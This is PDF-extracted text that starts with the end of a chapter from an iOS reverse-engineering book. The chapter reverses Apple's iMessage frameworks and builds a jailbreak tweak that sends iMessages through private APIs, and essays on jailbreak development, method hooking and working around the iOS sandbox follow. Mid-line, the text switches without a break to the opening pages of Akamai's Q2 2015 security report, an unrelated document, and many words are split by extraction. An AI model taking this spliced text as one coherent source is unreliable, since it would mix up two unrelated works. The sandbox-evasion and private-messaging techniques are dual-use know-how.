cy# chat = [[IMChatRegistry  sharedInstance]  chatForIMHan dle:handle]  
#"<IMChat  0x15809000>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeninny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90 -783B-4DEC-82CF-F58FBBB22363    Style: -   State: 3  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: 6592DD84 -4B34-4D54-BB40-
E2AB17B2FC67   Unread Count: 0  Failure Count: 0]" 
Gorgeous! To finally make it, we need to construct an IMMessage object for sending. Let ’s 
move it now.  
Open IMMessage.h, as shown in figure 10 -96. 

 
420  
Figure 10-  96 IMMessage.h 
There ’re lots of class methods, among which “instantMessageWithText:flags: ” gets our 
attention. Seems it returns an IMMessage object, but what ’re the 2 arguments? The 1st may be 
an NSString object, what about “flag”? I don ’t know if you still remember that earlier in this 
section, when we were locating [IMChat sendMessage:IMMessage], we ’ve “po”ed an 
IMMessage object in LLDB:  
(lldb) po $r2 
IMMessage[from=(null); msg-subject=(null); account:(null); flags=100005; subject='<< 
Message Not Loggable  >>' text='<<  Message Not Loggable  >>' messageID:  0 GUID:'966C2CD6 -
3710-4D0F-BCEF-BCFEE8E60FE9'  date:'437730968.559627'  date-delivered:'0.000000'  date-
read:'0.000000'  date-played:'0.000000'  empty: NO finished:  YES sent: NO read: NO 
delivered:  NO audio: NO played: NO from-me: YES emote: NO dd-results:  NO dd-scanned:  YES 
error: (null)] 
Although the “text” is “not loggable” , the “ flag” is 100005. Let ’s try it out  in Cycript: 
cy# [IMMessage  instantMessageWithText:@"iOSRE  test" flags:100005]  
-[__NSCFString  string]:  unrecognized  selector  sent to instance  0x1468c140  
Cycript reminds us that NSString failed to respond to @selector(string). In other words, the 
1st argum ent is not an NSString object, but instead some class that can respond to 
@selector(string). Let’ s try to get some clues in figure 10 -96, do you see “NSAttributedString 
*_text”  in line 17? According to the official documents, NSAttributedString does have a  property 
named “string ”, whose getter is “- (NSString *)string ”, as shown in figure 10 -97. 

 
421  
Figure 10-  97 [NSAttributedString string]  
Let’s test “instantMessageWithText:flags: ” with an NSAttributedString object:  
cy# attributedString  = [[NSAttributedString  alloc] initWithString:@"iOSRE  test"] 
#"iOSRE test{\n}" 
cy# message = [IMMessage  instantMessageWithText:attributedString  flags:100005]  
#"IMMessage[from=(null);  msg-subject=(null);  account:(null);  flags=186a5;  subject='<<  
Message Not Loggable >>' text='<<  Message Not Loggable  >>' messageID:  0 GUID:'00A8C645 -
D207-4F93-9739-07AAC94E7465'  date:'437812476.099226'  date-delivered:'0.000000'  date-
read:'0.000000'  date-played:'0.000000'  empty: NO finished:  YES sent: YES read: NO 
delivered:  NO audio: NO played: NO from-me: YES emote: NO dd-results:  YES dd-scanned:  NO 
error: (null)]"  
cy# [attributedString  release]  
An IMMessage object appears, but as you can see, the value of flags is presented in 
hexadecimal instead of decimal. Only a tiny fix is ne eded to make it correct:  
cy# message = [IMMessage instantMessageWithText:attributedString flags:1048581] 
#"IMMessage[from=(null); msg-subject=(null); account:(null); flags=100005; subject='<< 
Message Not Loggable  >>' text='<<  Message Not Loggable  >>' messageID: 0 GUID:'61012DF3 -
1C0F-4DED-9451-975E5771D493'  date:'447412682.028256'  date-delivered:'0.000000'  date-
read:'0.000000'  date-played:'0.000000'  empty: NO finished:  YES sent: NO read: NO 
delivered:  NO audio: NO played: NO from-me: YES emote: NO dd-results: NO dd-scanned:  YES 
error: (null)]”  
Everything should be ready by now. Last but not least:  
cy# [chat sendMessage:message]  
The effect is shown in figure 10 -98. Let’ s call it a day.  

 
422  
Figure 10-  98 iMessage delivered  
10.4    Result Interpretation  
Compared to previous practices, the reverse engineering methodology used in this chapter 
doesn’ t change much, but the overall workload has increased tremendously; As for difficulty, 
this chapter is way harder than chapter 7 and 8, though they ’re all targeting system A pps. To 
reverse the functions of detecting and sending iMessages, our general thoughts are as follows.  
1.   Cut into the code via UI 
The changing from “Text Message”  to “iMessage” , green color to blue color, and “Send”  
button itself are all UI visualizations produced by programs. As long as we can describe what we 
see on UI, we can cut into the App from there. In this chapter, our cut -in points are message 
placeholder and “Send”  button. Their UI functions can be easily located with Cycript, and are 
helpful in further analysis.  
2.   Browse and test class-dump headers to find interesting dots 
Objective -C headers are clearly organized, methods are explicitly named. Their high 
readability is the perfect place for us to look for r everse engineering clues. Testing private 
methods, properties and instance variables with Cycript can be really helpful when we want to 

 
423 know a certain private class better. In this chapter, when we came across some suspicious 
variables, we didn ’t strictly analyze them with IDA and LLDB, but by only browsing 
corresponding headers, guessing their prototypes and usages, then testing with Cycript to 
achieve our goals. The famous leader in my country Deng Xiaoping once said:"It doesn ’t matter 
whether a cat is wh ite or black, as long as it catches mice", which applies to iOS reverse 
engineering too.  
3.   Analyze functions in IDA to connect the dots and form a plane 
As to inspect the implementation of a function, IDA is one of the most handy tools. Cross 
references, addresses jumping, global search and whatever, they help us quickly locate what 
we’re interested in, as well browse the context to form an overall understanding. In detecting 
iMessages, we’ ve straightened out the relationships of [CKMessageEntryView 
updateEnt ryView], [CKPendingConversation sendingService], [CKPendingConversation 
composeSendingService], IMChatCalculateServiceForSendingNewCompose and so on; among 
them IMChatCalculateServiceForSendingNewCompose is a C function, hence is immune to 
class- dump. In s ending iMessages, we ’ve traced from the high level method 
[CKTranscriptController sendComposition:CKComposition], through [CKTranscriptController _startCreatingNewMessageForSending:], [CKConversation sendMessage:newComposition:] 
and [CKConversation sendMes sage:onService:newComposition:], to the low level method 
[IMChat sendMessage:IMMessage]. All these operations are picking call chains from a plane according to keywords and clues provided by IDA. That ’s a lot of handwork, but thanks to the 
assistance of ID A, the workload is totally acceptable.  
4.   Pick out the exact line, i.e. call chain from the plane with LLDB  
LLDB plays a significant role throughout the whole chapter. Although we ’ve tried to limit 
its usage in section 10.3, we have to bring it out when traci ng function callers and dynamically 
analyzing arguments. Compared with GDB, LLDB is more iOS supportive, there ’re rare crashes 
and bugs; it works great on Objective -C objects, making our debugging much smoother. When 
we were working on the detecting and se nding of iMessages, LLDB helped us clarify great 
amounts of details; based on the careful analysis of tightly related data sources, we ’ve abstracted 
a short piece of the working principles and designing ideas of iMessage: MobileSMS plays the 
 
424 role of a post  office; its building materials, office equipments and clerks are all from ChatKit, 
while IMCore is the postman. When I have a letter to send, I ’ll go to the post office and put the 
letter in the mailbox. Then a clerk will sort the letters out and hand the m to the postman; later 
the postman will give feedback of the delivery progress and result to the clerk, who are in 
charge of informing me what ’s happening to my letter. This kind of closed -loop service is very 
Apple -ish; MobileSMS, ChatKit and IMCore play  different roles, bringing Apple fans terrific user 
experiences. If we can learn how Apple design and implement all kinds of services via iOS 
reverse engineering, put them together and make them our own, it ’ll bring dramatically 
improvement to the elegance , design and robustness of our products, which is unattainable by 
only reading the official documents.  
10.5   Tweak writing  
After prototyping the tweak with Cycript, coding with Theos is just physical labor without 
much thinking. We’ ll add 2 methods to SMSApplica tion in MobileSMS, namely “- 
(int)madridStatusForAddress:(NSString *)address ” and “ - 
(void)sendMadridMessageToAddress:(NSString *)address withText:(NSString *)text ” then test 
them with Cycript. Let ’s move it!  
10.5.1  Create tweak project “iOSREMadridMessen ger ” using Theos  
The Theos commands are as follows:  
snakeninnys -MacBook:Code  snakeninny$  /opt/theos/bin/nic.pl  
NIC 2.0 - New Instance  Creator 
------------------------------  
  [1.] iphone/application  
  [2.] iphone/cydget  
  [3.] iphone/framework  
  [4.] iphone/library  
  [5.] iphone/notification_center_widget  
  [6.] iphone/preference_bundle  
  [7.] iphone/sbsettingstoggle  
  [8.] iphone/tool  
  [9.] iphone/tweak  
  [10.] iphone/xpc_service  
Choose a Template  (required):  9 
Project Name (required):  iOSREMadridMessenger  
Package Name [com.yourcompany.iosremadridmessenger]:  com.iosre.iosremadridmessenger  
Author/Maintainer  Name [snakeninny]:  snakeninny  
[iphone/tweak]  MobileSubstrate  Bundle filter [com.apple.springboard]:  
com.apple.MobileSMS  
[iphone/tweak]  List of applications  to terminate  upon installation  (space-separated,  '-' 
for none) [SpringBoard]:  MobileSMS  
Instantiating  iphone/tweak  in iosremadridmessenger/...  
 
425 Done. 
10.5.2  Compose iOSREMadridMessenger.h  
We’ve made use of multiple private classes and methods in previous sections, so we need to 
provide their definitions to avoid any compiler warning or error. Of course, the contents of 
iOSREMadridMessenger.h don ’t come from nowhere, it ’s composed by picking snippets from 
other class- dump headers, forming a “select header” . The finalized iOSREMadridMessenger.h 
looks like this: 
@interface  IDSIDQueryController  
+ (instancetype)sharedInstance;  
- (NSDictionary  *)_currentIDStatusForDestinations:(NSArray  *)arg1 service:(NSString  
*)arg2 listenerID:(NSString  *)arg3; 
@end 
 
@interface  IMServiceImpl  : NSObject  
+ (instancetype)iMessageService;  
@end 
 
@class IMHandle;  
 
@interface  IMAccount  : NSObject  
- (IMHandle  *)imHandleWithID:(NSString  *)arg1 alreadyCanonical:(BOOL)arg2;  
@end 
 
@interface  IMAccountController  : NSObject  
+ (instancetype)sharedInstance;  
- (IMAccount  *)__ck_defaultAccountForService:(IMServiceImpl  *)arg1; 
@end 
 
@interface  IMMessage  : NSObject  
+ (instancetype)instantMessageWithText:(NSAttributedString  *)arg1 flags:(unsigned  long 
long)arg2;  
@end 
 
@interface  IMChat : NSObject  
- (void)sendMessage:(IMMessage  *)arg1; 
@end 
 
@interface  IMChatRegistry  : NSObject  
+ (instancetype)sharedInstance;  
- (IMChat *)chatForIMHandle:(IMHandle  *)arg1; 
@end 
10.5.3  Edit Tweak.xm  
The finalized Tweak.xm looks like this:  
#import "iOSREMadridMessenger.h"  
%hook SMSApplication  
%new 
- (int)madridStatusForAddress:(NSString  *)address  
{ 
 NSString  *formattedAddress  = nil; 
 
426  if ([address  rangeOfString:@"@"].location  != NSNotFound)  formattedAddress  = 
[@"mailto:"  stringByAppendingString:addre ss]; 
 else formattedAddress  = [@"tel:"  stringByAppendingString:address];  
 NSDictionary  *status = [[IDSIDQueryController  sharedInstance]  
_currentIDStatusForDestinations:@[formattedAddress]  service:@"com.apple.madrid"  
listenerID:@"__kIMChatServiceForSendingI DSQueryControllerListenerID"];  
 return [status[formattedAddress]  intValue];  
} 
 
%new 
- (void)sendMadridMessageToAddress:(NSString  *)address  withText:(NSString  *)text 
{ 
 IMServiceImpl  *service  = [IMServiceImpl  iMessageService];  
 IMAccount  *account  = [[IMAcco untController  sharedInstance]  
__ck_defaultAccountForService:service];  
 IMHandle  *handle = [account  imHandleWithID:address  alreadyCanonical:NO];  
 IMChat *chat = [[IMChatRegistry  sharedInstance]  chatForIMHandle:handle];  
 NSAttributedString  *attributedString  = [[NSAttributedString  alloc] 
initWithString:text];  
 IMMessage  *message  = [IMMessage  instantMessageWithText:attributedString  
flags:1048581];  
 [chat sendMessage:message];  
 [attributedString  release];  
} 
%end 
10.5.4  Edit Makefile  and control  files 
The finalized Makefile looks like this:  
export THEOS_DEVICE_IP  = iOSIP 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:8.0  
 
include theos/makefiles/common.mk  
 
TWEAK_NAME  = iOSREMadridMessenger  
iOSREMadridMessenger_FILES  = Tweak.xm  
iOSREMadridMessenger_PRIVATE_FRAMEWORKS  = IDS ChatKit IMCore 
 
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec  "killall  -9 MobileSMS"  
The finalized control looks like this:  
Package: com.iosre.iosremadridmessenger 
Name: iOSREMadridMessenger 
Depends:  mobilesubstrate,  firmware  (>= 8.0) 
Version:  1.0 
Architecture:  iphoneos -arm 
Description:  Detect and send iMessage  example 
Maintainer:  snakeninny  
Author: snakeninny  
Section:  Tweaks 
Homepage:  http://bbs.iosre.com  
 
427 10.5.5  Test with Cycript  
Compile  and install the tweak, then ssh into iOS and execute the following commands:  
FunMaker -5:~ root# cycript -p MobileSMS  
cy# [UIApp madridStatusForAddress:@"snakeninny@icloud.com"]  
1 
cy# [UIApp sendMadridMessageToAddress:@"snakeninny@icloud.com"  withText:@"Sent  from 
iOSREMadridMessenger"]  
The madrid status of “snakeninny@icloud.com ” is 1, indicating it supports iMessage; plus 
the iMessage is sent and delivered like silk, as shown in figure 10 -99. 
 
Figure 10-  99 iMessage sent 
If you’ ve been so far, feel free to iMessage me at “snakeninny@gmail.com ” with 
iOSREMadridMessenger and share your joy :)  
10.6   Conclusion 
Being one of the key services since iOS 5, iMessage is greatly enhanced in iOS 8. Whether 
it’s plain text, image, audio, or even v ideo, iMessage can handle them all. Although detecting 
and sending iMessages is only a tip of iceberg in all iMessage operations, we ’ve switched among 
IDS, ChatKit and IMCore, as well felt the high complexity of the entire iMessage service. 
According to ou r analysis, the class in charge of iMessage accounts is IMAccountController; the 
class of iMessage accounts is IMAccount; recipient class is IMHandle; a message conversation is 

 
428 an IMChat or CKConversation object; IMChatRegistry is responsible for managing all IMChats; 
an iMessage is an IMMessage or CKComposition object. For those IM developers, the design of 
iMessage can be a precious reference.  
If you’ re still unsatisfied with this chapter and want to dig deeper into iMessage, try the 
following bonuses:  
•  Send SMS programmatically (Tip: just replace IMServiceImpl would be alright). 
•  Send iMessage with ChatKit (Tip: you can get a CKConversationfrom object from an IMChat 
object). 
•  Send iMessage inside SpringBoard (Tip: calling [IMChat sendMessage:IMMessage] inside 
SpringBoard fails to send messages, because SpringBoard lacks certain “capabilities”). 
If you can digest the contents of this chapter inside -out, and prototype the tweak without 
referring to the book, congratulations, you’ re a fairly outstanding iOS reverse engineer now, 
you are qualified and encouraged to step toward a higher goal, say, jailbreak. Before you begin 
the new journey, share your knowledge and experiences with us on http://bbs.iosre.com  to 
help build the jailbreak community. Thank you!  
  
 
429  
Jailbreaking for Developers, An Overview  
 
Much has been said about Apple ’s closed approach to selling devices and running an app 
platform. But what few know is that behind closed doors  there ’s a massive ecosystem of libraries 
and hardware features waiting to be unlocked by developers. All of the APIs Apple uses 
internally to build their services, applications, and widgets are available once the locks are 
broken via a process called jail breaking. Most of them are written in Objective -C, a dynamic 
language that provides very rich introspection capabilities and has a culture of self -describing 
code. Further tearing down barriers, most people install something called CydiaSubstrate 
shortly a fter jailbreaking, which allows running custom code inside every existing process on the 
device. This is very powerful —not only have we broken out of the walled garden into the rest 
of the forest, all of the footpaths are already labeled. Building code tha t targets jailbroken iOS 
devices involves unique ways of inspecting APIs, injecting code into processes, and writing code 
that modifies existing classes and finalized behaviors of the system.  
The APIs implemented on iOS can be divided into four categories: framework -level 
Objective -C APIs, app -level Objective -C classes, C- accessible APIs and JavaScript -accessible 
APIs. Objective -C frameworks are the most easily accessible. Normally the structur e of a 
component is only accessible to the programmer and those the source code or documentation 
have been made available to, but compiled Objective -C binaries include method tables 
describing all of the classes, protocols, methods and instance variables c ontained in the binary. 
An entire family of “class- dump”  tools exists to take these method tables and convert them to 
header -like output for easy consumption by adventurous programmers. Calling these APIs is as 
simple as adding the generated headers to your project and linking with the framework or 
library. The  second category of app internal classes may be inspected via the same tools, but are 
not linkable via standard tools. To get to those classes, one has to have code injected into the app in question and use the Objective -C runtime function objc_getClass to  get a reference to the 
class; from there, one can call APIs via the headers generated by the tool. Inspecting C -level 
 
430 functions are more difficult. No information about what the parameters or data structures are 
baked into the binaries, only the names of exported functions. The developer tools that ship 
with OS X come with a disassembler named “otool ” which can dump the instructions used to 
implement the code in the device. Paired with knowledge of ARM assembly, the type 
information can be reconstructed by  hand with much effort. This is much more cumbersome 
than with Objective -C code. Luckily, some of the components implemented in C are shared 
with OS X and have headers available in the OS X SDK, or are available as open -source from 
Apple. JavaScript -level APIs are most often facades over Objective -C level APIs to make 
additional functionality accessible to web pages hosted inside the iTunes, App Store, iCloud and 
iAd sections of the operating system.  
Putting the APIs one has uncovered to use often requires  having code run inside the process 
where their implementations are present. This can be done using the 
DYLD_INSERT_LIBRARIES environment variable on systems that use dyld, but this facility 
offers very few provisions for crash protection and can easily le ave a device in a state where a 
restore is necessary. Instead, the gold standard on iOS devices is a system known as Cydia Substrate, a package that standardizes process injection and offers safety features to limit the 
damage testing new code can do. Once Cydia Substrate is installed, one needs only to drop a 
dynamic library compiled for the device in /Library/ MobileSubstrate/DynamicLibraries, and substrate will load it automatically in every process on the device. Filtering to only a specific 
process can  be achieved by dropping a property list of the same name alongside it with details 
on which process or grouping of processes to filter to. Once inside, one can register for events, 
call system APIs and perform any of the same behaviors that the process no rmally could. This 
applies to apps that come preinstalled on the device, apps available from the App Store, the window manager known as SpringBoard, UI services that apps can make use of such as the mail 
composer, and background services such as the media decoder daemon. It is important to note 
that any state that the injected code has will be unique to the process it ’s injected into and to 
share state mandates use inter -process communication techniques such as sockets, fifos, mach 
ports and shared memory.  
Modifying existing code is where it really starts to get powerful and allows tweaking existing 
functionality of the device in simple or even radical ways. Because Objective -C method lookup 
is all done at runtime and the runtime offers APIs to modify metho ds and classes, it is really 
 
431 straightforward to replace the implementations of existing methods with new ones that add new 
functionality, suppress the original behavior or both. This is known as method hooking and in 
Objective -C is done through a complicat ed dance of calls to the class_addMethod, class_ 
getInstanceMethod, method_getImplementation and method_setImplementation runtime 
functions. This is very unwieldy; tools to automate this have been built. The simplest is Cydia 
Substrate’ s own MSHookMessage function. It takes a class, the name of the method you want to 
replace, the new implementation, and gives back the original implementation of the function so that the replacement can perform the original behavior if necessary. This has been further 
automated in the Logos Objective -C preprocessor tool, which introduces syntax specifically for 
method hooking and is what most tweaks are now written in. Writing Logos code is as simple 
as writing what would normally be an Objective -C method implementation, and s ticking it 
inside of a %hook ClassName ... %end block instead of an @implementation ClassName ... %end block, and calling %orig() instead of [super ...]. Simple tweaks to how the 
system behaves can often done by replacing a single method with a different i mplementation, 
but complicated adjustments often require assembling numerous method hooks. Since most of iOS is implemented in Objective -C, the vast majority of tweaks need only these building blocks 
to apply the modifications they require. For the lower l evels of the system that are written in C, 
a more complicate hooking approach is required. The lowest level and most compatible way of 
doing so is to simply rewrite the assembly instructions of the victim function. This is very 
dangerous and does not compo se well when many developers are modifying the same parts of 
the system. Again, CydiaSubstrate introduces an API to automate this in form of 
MSHookFunction. Just like MSHookMessage, one needs only to pass in the target function, new 
replacement implementation function, and it applies the hook and returns the old 
implementation that the new replacement can call if necessary. With the tools the community 
has made available, the details of the very complex mechanics of hooking have been abstracted 
and simplifi ed to the point where they ’re hidden from view and a developer can concentrate on 
what new features they ’re adding.  
Combining these techniques unique to the jailbreak scene, with those present in the 
standard iOS and OS X development communities yields a very flexible and powerful tool chest 
for building features and experiences that the world hasn ’t seen yet.  
Ryan Petrich 
 
432  
Evading the Sandbox 
 
 
As a security measure and to keep apps on the device from sharing data or interfering with 
each other, iOS includes a security system known as the sandbox. The sandbox blocks access to 
files, network sockets, bootstrap service names, and the ability to spawn subprocesses. Part of 
the jailbreaking process involves modifying the sandbox so that all processes can load Cydia 
Substrate, but much of the sandbox is left intact to respect the security and privacy of the user ’s 
data.  
With each new release, Apple further improves the sandbox to improve privacy and 
security. When building extensions or tweaks that need to  share information across processes or 
persist data to disk, this can be restrictive. One approach is to survey the sandbox restrictions that exist on the processes where the extension is to be run, and choose file paths and names 
based on them. This is common, but can leave oneself stranded when Apple tightens the 
tourniquet and as of iOS 8 there is no location that all processes can read and write successfully. 
A better approach is to do all of the interesting work inside a privileged process such as 
SpringBoard, backboardd or even a manually created launch daemon of your own. Child 
processes can then send work to the privileged service. This ensures that as the sandbox tightens, your extension will still behave properly as long as it can communicate with the 
service.  
Oddly enough, as of iOS 8 Apple has also decided to limit which services an app store 
process may query. This makes nearly all forms of inter -process communication ineffective on 
iOS, outside of the well -defined static services that Apple has designated. RocketBootstrap was 
created as a way around this that simultaneously allows additional services to be registered and 
respects the security and privacy of the user ’s data. Services registered with RocketBootstrap are 
made globally accessible ev en in spite of very restrictive sandbox rules and it will serve as a 
 
433 single project that needs updating as the rules change.  
Ryan Petrich 
Code Wrangler, Father of Activator  
  
 
434  
Tweaking is the new- age hacking  
 
 
I am not a prolific programmer by any means. I have a programmer ’s mind, and I have 
proven in my days I am capable of writing working solutions. I have a few tweaks in my name, 
and more ideas to be realized. Creating more has been about having more free time. However, 
my time has been spent be coming familiar with iOS -internals, because I find that I am a good 
learner. I have a fair understanding due to the tools we have available, made by great programmers before our time, and from documentation and examples shared by the 
community. Because of the nature of Cocoa and Objective -C, we can take a great adventure and 
introspection into the workings of third- party software, and Apple’ s operating system. This 
provides a foundation and skills for making tweaks. We want to encourage tweak making 
because  it has been the driving initiative behind the audience that wants to have jailbroken 
devices, besides for the groups that wish to only have a jailbreak for pirating apps and games. 
The growth of this jailbreak ecosystem has gone with the proliferation of new tweaks, ever 
pushing the boundaries of modification while maintaining a safe environment for the end -users.  
The jailbreak development scene has given a unique opportunity to developers to express 
themselves in a new way. In the days before CydiaSubstr ate, apps and games were not tweaked. 
This is a new concept; examining and debugging existing software and then rewriting portions 
of it with the least invasive tools available, the changes are nonpermanent and for the most part 
free of worry for breaking something with any lasting effect. Tweaks allow for a redefining of 
how software works and behaves. We do this with tweaks, and there has really been nothing like it before in the world of programming, even on the PC. There were opportunities 
throughout pr evious decades to make game patches, hacks and so forth, but it ’s only with the 
emergence of the audience of jailbreakers and iOS that we find our unique situation. Only recently has it become feasible to make small adjustments to existing UI and modify ho w things 
work without requiring the replacement of whole parts of the code - CydiaSubstrate allows 
 
435 careful targeting of methods and functions.  
It’s a lot of fun to discover how things work, and tweak making is the embodiment of that 
fun time for developers. One of the challenges for tweak making is coming up with new ideas to 
create, and sometimes these ideas only arise after studying the internals in some detail. If you 
make tweaks as a hobby, and not as a profession, you ’re free to do as you wish and to focus on 
projects that interest you. For new tweak makers, there’ re quite a lot of existing projects to learn 
from, but a lot of the easier projects have already been realized. Creating new original ideas that 
are unique is a task of being familiar with th e available tweaks on Cydia, and then going to work 
discovering how the internal parts work, debugging and testing until you have a diagram or picture in your mind how it ’s put together. When you reach a near complete understanding, 
you are primed to tackl e whatever challenge you make for yourself.  
Some of our greatest tools and resources are free: Apple ’s own documentation is excellent, 
and for tweak makers we have a wiki and the opportunity to use class -dump to examine what 
methods are exposed for hookin g inside the target app or process. Debugging and disassembly 
tools that vary from free to paid, all can be great assets for tweak makers. A well -studied 
programmer with some prior experience with standard projects will be in a good position to 
continue le arning from these materials. To the contrary, a newcomer programmer, even a 
person with some good ideas will struggle at first with the learning curve. We recommend a core understanding of Objective -C and Cocoa principles for aspiring young tweak makers; t his 
can be a significant investment of time, but it is really a hurdle for new tweak makers that haven ’t a clue where to start. To the uninitiated, the object -oriented nature of the programming 
involved can be a daunting thing to realize. Generating tweak ideas can be a task for amateurs, 
but the writing of the code for the tweak implementation is often the result of planning and 
research and testing for a significant time. We find that many young new programmers are 
impatient because their ideas for new tw eaks do take more time to materialize than they were 
willing to invest. Patience is a virtue of course, and the best -made tweaks are all products of 
careful programmers.  
The greatest tweak is Activator (libactivator). Based on a commonsense idea of having  more 
triggers system -wide, activator is also a graciously open -sourced project; the product of many 
months and years of work by our most senior tweak maker, Ryan Petrich. His dedication and 
expertise shines through in Activator, which doubles as a platfor m for third -parties to harness 
 
436 the powerful triggers from anyplace to use in their own projects. It represents a lot of research 
and understanding of the most obscure internals on iOS: SpringBoard and backboard. If there is 
one shining example to point to as a goal for a tweak maker to show how much research and 
careful planning can go into a tweak, that is the example to look towards. It ’s a lofty project that 
none should consider as being trivial to do, however. For some aspiring developers it can be a 
great encouragement to see what is possible. Kudos to Ryan Petrich for making it, and for all he 
does to further the jailbreak development community.  
As the repo maintainer for TheBigBoss, I have a job description for myself. Doing my job 
has given tremendous opportunity to be an influence or guidance for new tweak makers. Often 
their first experience with another member of the jailbreak development community is with 
myself when they first contact me or submit to the repo. We wish that all developers can be 
involved in the social channels of this scene: chat, forums, twitter et al., however, it ’s not 
uncommon that some developers work in relative isolation from these social groups. My involvement then can be seen as important: I may be the only other voice th at the programmer 
will hear, and I will give an opinion on the technical merits of new tweak projects; often this first encounter is invaluable because those developers that work in isolation are not wise to many of 
the caveats and conventions we hold as i mportant in this community. Our documentation and 
wikis have improved to make these details more available, but still I am often the first time a developer has some interaction with someone with a greater expertise than their own. I try to 
give my wisdom a nd guidance to the developers because its in our best interest to support, if not 
groom, newcomer developers so they feel as part of the group of jailbreak developers, and they 
can be pointed towards ways to avoid some of the pitfalls that many newcomers m ake. I take 
some pride in doing this and helping in part to strengthen the developer community that is based around the tweak -making culture. I want the jailbreak platform to continue to grow and 
mature by the great ideas that are envisioned and the expert ise to realize them.  
Do not be discouraged when the task seems difficult. We have some developers with years 
and decades of programming experience, and we also have some with only a few weeks or months. I come from the school of thought that it should be well made and well tested, and not 
rushed or forced. If you have a goal, it should not be merely to have something of yours 
published on a Cydia repo, but to give something to the public, which will enrich their jailbreak 
experiences -  that is for hobbyist s like myself. If you have some commercial interest in Cydia, 
 
437 and for making an selling tweaks, do wide testing with users and alongside other tweaks to help 
assure a product that works for many users and their combinations of tweaks; your duty as a 
responsible tweak maker is to be careful while you modify the insides of others ’ programs or 
apps, and to be thorough in testing compatibility with others ’ tweaks.  
Tweak making is the new- age hacking. There ’re already enough reasons for you to get 
started with tweak development, and we need tweaks to keep the jailbreak community in 
bloom. Join us, learn from others, work hard, be patient, and have fun.  
Optimo 
Administrator at TheBigBoss repo  akamai’s [state of the internet] / security
Q2 2015 report
[Volume 2  / Number 2]
 [state of the internet] / security / Q2 2015
FASTER FORWARD TO THE LATEST  
GLOBAL BROADBAND TRENDS
Join us at stateoftheinternet.com for a glimpse into the future of connectivity
Download Akamai’s latest  
[state of the internet] report
TAP
HERE
3 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
 [LETTER FROM THE EDITOR]
letter from the editor / The q2 2015 State of the 
Internet— Security Report builds on the significant changes 
we made in last quarter’s report. 
With this edition, we’ve continued to combine attack data 
previously published in the classic State of the Internet 
Report with the data previously published in the quarterly 
Prolexic DDoS Attack Report. The two data sources help form a more holistic view of the Internet and the attacks 
that occur on a daily basis. 
Each technology collects a distinct data set that represents a 
unique view of the Internet. This allows Akamai to compare 
and contrast the different indicators of attack activity.
We explore which industries among our customer base 
suffered the highest volume of attacks, which attack 
techniques and vectors were more common, and where the 
attack traffic originated.
We hope you find it valuable.
As always, if you have comments, questions, or suggestions 
regarding the State of the Internet Security Report, the website, or the mobile applications, connect with us via email 
at stateoftheinternet-security@akamai.com or on Twitter at 
@State_Internet .
Y ou can also interact with us in the State of the Internet subspace on the Akamai Community at  
https://community.akamai.com. 
Akamai Technologies 
4 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
 [TABLE OF CONTENTS]
5  [SECTION]1 = ANALYSIS + EMERGING TRENDS
9  1.1 / DDoS Activity
9   1.1A / DDoS Attack Bandwidth, Volume and Duration 
10   1.1B / Mega Attacks
13   1.1C / DDoS Attack Vectors
15   1.1D / Infrastructure Layer vs. Application Layer DDoS Attacks
19   1.1E / Top 10 Source Countries
21   1.1F / Target Industries
22   1.1G / DDoS Attacks — A Two-year Look back
24  1.2 / Kona Web Application Firewall Activity
26   1.2A / Web Application Attack Vectors
27   1.2B / Web Application Attacks Over HTTP vs. HTTPS
29   1.2C / Top 10 Source Countries
30   1.2D / Top 10 Target Countries
31   1.2E / Normalized View of Web Application Attacks
35   1.2F / Future Web Application Attacks Analysis
35  1.3 / Data Sources
37 [SECTION]2 = MULTI-VECTOR DDoS ATTACKS
38  2.1 / Attack Signatures
40  2.2 / ACK and SYN Behavior in a Distributed Attack
41  2.3 / Source Countries
41  2.4 / Not DDoS-for-Hire
42  2.5 / Summary
43  [SECTION]3 = CASE STUDY: WORDPRESS AND THE 
DANGER OF THIRD-PARTY PLUGINS
44  3.1 / General Findings
46  3.2 / Cross-Site Scripting
47  3.3 / Email Header Injection
48  3.4 / Open Proxy Scripts
52  3.5 / Command Injection
54  3.6 / Cleanup
54  3.7 / Mitigation and Best Practices59 [SECTION]4 = Tor: THE PROS AND CONS
60  4.1 / Tor, the Foes
61  4.2 / Risk Analysis
62  4.3 / Tor Traffic vs. Non-Tor Traffic
64  4.4 / Tor Attacks by Category
65  4.5 / Tor Attack Distribution by Target Industry
65  4.6 / Tor Attack Distribution by Target Country
65  4.7 / Potential Impact on Business
67  4.8 / Summary
68 [SECTION]5 = CLOUD SECURITY RESOURCES
68  5.1 / OurMine Team Attack Exceeds 117 Gbps
69  5.2 / RIPv1 Reflection DDoS Makes a Comeback
71   5.2A / Third-Party Plugins Ripe for Attack
73   5.2B / The Logjam Vulnerability
73   5.2C / DD4BC Escalates Attacks
76 [SECTION]6 = LOOKING FORWARD
78 ENDNOTES
[SECTION ]1
ANALYSIS + 
EMERGING TRENDS
5 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.comThe second quarter of 2015 set a record for the number of distributed 
denial of service (DDoS) attacks recorded on Akamai’s Prolexic Routed 
network — more than double what was reported in q 2 2014. The profile 
of the typical attack, however, has changed. In q2 last year, high-bandwidth,  
short-duration attacks were the norm, driven by the use of server-based botnets. This quarter, less powerful but longer duration attacks were the norm.
6 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
In q2 2015, the largest DDoS attack measured more than 240 gigabits per second 
(Gbps) and persisted for more than 13 hours. The peak bandwidth is typically 
constrained to a one to two hour window.
Of course, bandwidth is not the only measure of attack size. q 2 2015 saw one of the 
highest packet rate attacks recorded across the Prolexic Routed network, which 
peaked at 214 million packets per second (Mpps). That volume is capable of taking 
out tier 1 routers, such as those used by Internet service providers (ISPs).
syn and Simple Service Discovery Protocol (ssdp ) were the most common DDoS 
attack vectors this quarter — each accounting for approximately 16% of DDoS 
attack traffic. The proliferation of unsecured home-based, Internet-connected 
devices using the Universal Plug and Play (UPnP) Protocol continues to make  [SECTION]1 = ANALYSIS + EMERGING TRENDS
Compared to q2 2014
